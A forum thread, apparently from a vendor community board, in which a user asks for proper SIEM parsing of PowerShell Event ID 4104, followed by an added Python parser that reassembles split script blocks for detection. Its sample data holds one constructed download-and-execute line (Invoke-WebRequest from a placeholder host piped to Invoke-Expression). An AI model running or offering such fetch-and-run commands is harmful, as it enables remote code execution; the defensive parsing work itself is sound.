I am wondering if anyone had any luck ingesting this event. I'm running the latest SIEM version and PowerShell Event ID 4104 is not parsing correctly. I see the domain and username but not the command.
It's been years since this command was introduced and given the frequency of PowerShell attacks, I'm really surprised that the SIEM cannot parse this event. Event ID 800 is parsing correctly, however this is a legacy event that is not present in Windows 2016 systems. Event 4104 also contains more information.
If someone from McAfee is reading this, can we please have a proper parser for this event.
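Added example, not code from this thread or from McAfee's product: a minimal parser for the raw 4104 event XML showing the fields a SIEM has to pull to get the command text, plus reassembly of script blocks that PowerShell splits across several 4104 events. The EventData names used here (MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path) and the Security UserID attribute are what Windows writes in the Microsoft-Windows-PowerShell/Operational channel; the sample events, hostname, SID, GUIDs and script text are constructed for the demonstration. Note that the raw event carries the user as a SID, so a parser that only resolves domain and username has simply not been told where ScriptBlockText lives.

```python
"""Parse PowerShell Event ID 4104 (script block logging) XML and reassemble
script blocks that Windows split across several events."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4104(xml_text):
    """Return the fields a SIEM parser should extract from one 4104 event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", EVT_NS)
    event_id = int(system.findtext("e:EventID", namespaces=EVT_NS))
    if event_id != 4104:
        raise ValueError(f"not a 4104 event: {event_id}")
    # EventData is a flat list of <Data Name="..."> elements; Path is empty
    # for interactive input, and Level 3 (Warning) instead of 5 (Verbose)
    # marks blocks PowerShell itself flagged as suspicious.
    data = {d.get("Name"): (d.text or "")
            for d in root.find("e:EventData", EVT_NS).findall("e:Data", EVT_NS)}
    security = system.find("e:Security", EVT_NS)
    return {
        "computer": system.findtext("e:Computer", namespaces=EVT_NS),
        "user_sid": security.get("UserID") if security is not None else None,
        "level": int(system.findtext("e:Level", namespaces=EVT_NS)),
        "script_block_id": data.get("ScriptBlockId"),
        "path": data.get("Path", ""),
        "message_number": int(data.get("MessageNumber", "1")),
        "message_total": int(data.get("MessageTotal", "1")),
        "script_block_text": data.get("ScriptBlockText", ""),
    }


class ScriptBlockAssembler:
    """Buffer fragments per ScriptBlockId; emit the full text once all parts arrive."""

    def __init__(self):
        self._parts = defaultdict(dict)

    def add(self, event):
        sbid = event["script_block_id"]
        self._parts[sbid][event["message_number"]] = event["script_block_text"]
        if len(self._parts[sbid]) == event["message_total"]:
            parts = self._parts.pop(sbid)
            return "".join(parts[i] for i in sorted(parts))  # order by MessageNumber
        return None


def reassemble_all(xml_events):
    """Parse a stream of 4104 events and return (ScriptBlockId, full text) pairs."""
    asm = ScriptBlockAssembler()
    out = []
    for xml_text in xml_events:
        ev = parse_4104(xml_text)
        full = asm.add(ev)
        if full is not None:
            out.append((ev["script_block_id"], full))
    return out


def _event_xml(sbid, number, total, text, path="", level=5):
    """Build a constructed 4104 event in the layout Windows uses (sample data, not a capture)."""
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PowerShell"/>
    <EventID>4104</EventID><Version>1</Version><Level>{level}</Level>
    <Task>2</Task><Opcode>15</Opcode><Keywords>0x0</Keywords>
    <TimeCreated SystemTime="2023-01-01T00:00:00.000000000Z"/>
    <EventRecordID>1</EventRecordID>
    <Execution ProcessID="4242" ThreadID="4243"/>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
    <Computer>ws01.example.local</Computer>
    <Security UserID="S-1-5-21-1111111111-2222222222-3333333333-1001"/>
  </System>
  <EventData>
    <Data Name="MessageNumber">{number}</Data>
    <Data Name="MessageTotal">{total}</Data>
    <Data Name="ScriptBlockText">{escape(text)}</Data>
    <Data Name="ScriptBlockId">{sbid}</Data>
    <Data Name="Path">{escape(path)}</Data>
  </EventData>
</Event>"""


# Constructed sample: one single-part block and one block split in two,
# with the second fragment arriving before the first.
SINGLE_ID = "6c5e4d3c-0000-4000-8000-000000000001"
SPLIT_ID = "6c5e4d3c-0000-4000-8000-000000000002"
SINGLE_TEXT = "Get-Process | Where-Object CPU -gt 100"
FRAG1 = "Invoke-WebRequest -Uri http://example.invalid/a.ps1 | "
FRAG2 = "Invoke-Expression"
SAMPLE_EVENTS = [
    _event_xml(SINGLE_ID, 1, 1, SINGLE_TEXT),
    _event_xml(SPLIT_ID, 2, 2, FRAG2, path=r"C:\Users\alice\dl.ps1", level=3),
    _event_xml(SPLIT_ID, 1, 2, FRAG1, path=r"C:\Users\alice\dl.ps1", level=3),
]

if __name__ == "__main__":
    for sbid, text in reassemble_all(SAMPLE_EVENTS):
        print(sbid, "->", text)
```

The assembler is the part most SIEM field mappings miss: a long script arrives as N events sharing one ScriptBlockId, and alerting on the fragments individually lets an attacker hide a command by pushing it across a chunk boundary.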
I moved this out of an area it was placed in incorrectly. (No fault of yours)
Hopefully someone with Corporate knowledge will add to the discussion in short order.